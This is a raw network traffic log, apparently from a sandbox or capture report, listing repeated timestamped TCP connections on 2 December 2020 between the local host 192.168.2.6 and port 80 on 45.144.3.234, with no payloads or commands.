                                            Dec 2, 2020 11:54:01.748774052 CET804992045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.748821974 CET804992045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.749432087 CET4992080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.749495983 CET4992080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.802980900 CET804992045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.985008955 CET4992180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.037930012 CET804992145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.038108110 CET4992180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.042783022 CET4992180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.099414110 CET804992145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.099517107 CET4992180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.152169943 CET804992145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.174634933 CET804992145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.174673080 CET804992145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.174844980 CET4992180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.174947023 CET4992180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.230545044 CET804992145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.426830053 CET4992280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.479443073 CET804992245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.484067917 CET4992280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.488890886 CET4992280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.541663885 CET804992245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.541819096 CET4992280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.594343901 CET804992245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.615942001 CET804992245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.615979910 CET804992245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.616091013 CET4992280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.616178036 CET4992280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.668864012 CET804992245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.812009096 CET4992380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.864881992 CET804992345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:02.865053892 CET4992380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:02.873127937 CET4992380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.024249077 CET804992345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.024460077 CET4992380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.077171087 CET804992345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.102365971 CET804992345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.102411032 CET804992345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.102602005 CET4992380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.102680922 CET4992380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.155143023 CET804992345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.348254919 CET4992480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.400891066 CET804992445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.401071072 CET4992480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.408857107 CET4992480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.460161924 CET804992445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.460256100 CET4992480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.511502981 CET804992445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.534225941 CET804992445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.534266949 CET804992445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.534456015 CET4992480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.534570932 CET4992480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.586288929 CET804992445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.760579109 CET4992580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.813469887 CET804992545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.813638926 CET4992580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.821188927 CET4992580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.874046087 CET804992545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.874212980 CET4992580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.929984093 CET804992545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.950833082 CET804992545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.950877905 CET804992545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:03.950965881 CET4992580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:03.951044083 CET4992580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.003829956 CET804992545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.169460058 CET4992680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.222033024 CET804992645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.222160101 CET4992680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.227868080 CET4992680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.280311108 CET804992645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.281078100 CET4992680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.333307028 CET804992645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.356916904 CET804992645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.356957912 CET804992645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.357042074 CET4992680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.357074022 CET4992680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.409301996 CET804992645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.627744913 CET4992780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.680526972 CET804992745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.680754900 CET4992780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.684159994 CET4992780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.737689018 CET804992745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.737780094 CET4992780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.790472984 CET804992745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.824449062 CET804992745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.824480057 CET804992745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:04.824584961 CET4992780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.824696064 CET4992780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:04.877801895 CET804992745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.026362896 CET4992880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.078746080 CET804992845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.080178022 CET4992880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.082818985 CET4992880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.135119915 CET804992845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.144393921 CET4992880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.196155071 CET804992845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.223505020 CET804992845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.223563910 CET804992845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.223731995 CET4992880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.223779917 CET4992880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.275476933 CET804992845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.645334959 CET4992980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.698755980 CET804992945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.698939085 CET4992980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.706168890 CET4992980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.763911963 CET804992945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.764142036 CET4992980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.819299936 CET804992945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.846091032 CET804992945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.846153975 CET804992945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:05.846311092 CET4992980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:05.900644064 CET804992945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.057346106 CET4993080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.109457016 CET804993045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.109633923 CET4993080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.116519928 CET4993080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.182209969 CET804993045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.182387114 CET4993080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.234210968 CET804993045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.257916927 CET804993045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.257963896 CET804993045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.258191109 CET4993080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.261944056 CET4993080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.310014009 CET804993045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.454679966 CET4993180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.506417036 CET804993145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.506618023 CET4993180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.510435104 CET4993180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.562120914 CET804993145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.562309027 CET4993180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.613941908 CET804993145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.636279106 CET804993145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.636317968 CET804993145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.636636972 CET4993180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.636687040 CET4993180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.688968897 CET804993145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.851758957 CET4993280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.905786991 CET804993245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.906008005 CET4993280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.913352013 CET4993280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:06.966052055 CET804993245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:06.966228962 CET4993280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.019232035 CET804993245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.043773890 CET804993245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.043908119 CET4993280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.043961048 CET804993245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.044078112 CET4993280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.115905046 CET804993245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.315594912 CET4993380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.368576050 CET804993345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.368884087 CET4993380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.374504089 CET4993380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.433018923 CET804993345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.433208942 CET4993380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.486285925 CET804993345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.512545109 CET804993345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.512582064 CET804993345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.512748957 CET4993380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.514688969 CET4993380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.570596933 CET804993345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.689882994 CET4993480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.741735935 CET804993445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.743136883 CET4993480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.745647907 CET4993480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.797350883 CET804993445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.797575951 CET4993480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.849359035 CET804993445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.870342016 CET804993445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.870384932 CET804993445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:07.870492935 CET4993480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.870537996 CET4993480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:07.922398090 CET804993445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.062702894 CET4993580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.115705013 CET804993545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.116739035 CET4993580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.120275021 CET4993580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.172703981 CET804993545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.175287008 CET4993580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.227821112 CET804993545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.249250889 CET804993545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.249300957 CET804993545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.249392033 CET4993580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.249417067 CET4993580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.302515984 CET804993545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.446310997 CET4993680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.499691963 CET804993645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.501621962 CET4993680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.508028030 CET4993680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.560830116 CET804993645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.564369917 CET4993680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.617069006 CET804993645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.637877941 CET804993645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.637902021 CET804993645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.642570019 CET4993680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.754590988 CET4993680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:08.816982031 CET804993645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:08.952889919 CET4993780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:09.006717920 CET804993745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:09.105753899 CET4993780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:09.113024950 CET4993780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:09.165683985 CET804993745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:09.166830063 CET4993780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:09.219317913 CET804993745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:09.240145922 CET804993745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:09.240164042 CET804993745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:09.392762899 CET4993780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:09.395236015 CET4993780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:09.450047970 CET804993745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.182426929 CET4993880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.235219955 CET804993845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.235498905 CET4993880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.242526054 CET4993880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.294930935 CET804993845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.302968979 CET4993880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.355248928 CET804993845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.376329899 CET804993845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.376390934 CET804993845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.384274960 CET4993880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.384358883 CET4993880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.436644077 CET804993845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.584145069 CET4993980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.636512995 CET804993945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.636626959 CET4993980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.639262915 CET4993980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.692208052 CET804993945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.692301989 CET4993980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.745311022 CET804993945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.771996021 CET804993945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.772046089 CET804993945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:11.772233009 CET4993980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.774827957 CET4993980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:11.828021049 CET804993945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.016954899 CET4994080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.069093943 CET804994045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.069263935 CET4994080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.071896076 CET4994080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.124988079 CET804994045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.125400066 CET4994080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.177370071 CET804994045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.200444937 CET804994045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.200467110 CET804994045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.201318026 CET4994080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.201363087 CET4994080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.253256083 CET804994045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.578025103 CET4994180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.630367994 CET804994145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.630969048 CET4994180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.634165049 CET4994180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.686697006 CET804994145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.686851978 CET4994180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.739267111 CET804994145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.768111944 CET804994145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.768183947 CET804994145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.768383026 CET4994180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.768428087 CET4994180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:12.821501017 CET804994145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:12.958080053 CET4994280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.009316921 CET804994245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.009485006 CET4994280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.017353058 CET4994280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.069080114 CET804994245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.069201946 CET4994280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.120321989 CET804994245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.140944958 CET804994245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.140969038 CET804994245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.141175985 CET4994280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.141204119 CET4994280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.192352057 CET804994245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.396028996 CET4994380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.452682972 CET804994345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.452884912 CET4994380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.460319996 CET4994380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.514198065 CET804994345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.514307022 CET4994380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.566983938 CET804994345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.589608908 CET804994345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.589643955 CET804994345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.589764118 CET4994380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.589904070 CET4994380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.670332909 CET804994345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.847206116 CET4994480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.900266886 CET804994445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.900402069 CET4994480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.903883934 CET4994480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:13.956267118 CET804994445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:13.956406116 CET4994480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.009093046 CET804994445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.030296087 CET804994445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.030338049 CET804994445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.030492067 CET4994480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.030571938 CET4994480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.082995892 CET804994445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.213310003 CET4994580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.265988111 CET804994545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.266154051 CET4994580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.273895979 CET4994580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.326437950 CET804994545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.326558113 CET4994580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.387767076 CET804994545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.412825108 CET804994545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.412878036 CET804994545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.412997007 CET4994580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.413050890 CET4994580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.467689037 CET804994545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.665205002 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.717559099 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.717683077 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.721467972 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.773453951 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.773554087 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.826003075 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.852649927 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.852705002 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.852993011 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.853024960 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.905347109 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.073704958 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.126600027 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.126725912 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.132386923 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.185878992 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.187186003 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.239947081 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.261504889 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.261539936 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.261635065 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.261672020 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.314454079 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.488081932 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.540329933 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.540494919 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.547116041 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.599402905 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.599518061 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.652380943 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.675228119 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.675267935 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.675373077 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.676080942 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.728513002 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.849126101 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.917526960 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.917656898 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.920391083 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.973742008 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.978032112 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.030641079 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.055699110 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.055768013 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.056364059 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.056415081 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.110754013 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.297581911 CET4995080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.352760077 CET804995045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.352967024 CET4995080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.357728004 CET4995080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.409969091 CET804995045.144.3.234192.168.2.6
